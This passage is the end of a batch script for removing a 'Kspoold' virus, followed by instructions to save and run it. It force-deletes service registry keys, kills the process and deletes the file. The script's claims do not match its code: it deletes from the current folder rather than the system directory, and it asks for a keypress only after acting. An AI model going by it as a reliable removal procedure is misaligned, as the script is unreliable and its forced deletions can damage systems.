Reg delete "HKLM\SYSTEM\ControlSet001\Services\KspooldDaemon" /f
Reg delete "HKLM\SYSTEM\ControlSet002\Services\KspooldDaemon" /f
Reg delete "HKLM\SYSTEM\CurrentControlSet\Services\KspooldDaemon" /f
REM - Stop the virus process
TaskKill /IM Kspoold.exe /F /T
REM - Reset the virus file's attributes to normal
Attrib -s -h -r Kspoold.exe
REM - Delete the virus file
Del Kspoold.exe
Cls
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Echo Press any key to continue...
Echo.
Echo Well done -The "Kspoold" was completely removed
Echo.
Pause
Copy and paste the script above into Notepad, and save it as
‘’Verdhy Kspoold.BAT’’ (without the quotation marks)
After saving it, run it by double-clicking the file Verdhy Kspoold.BAT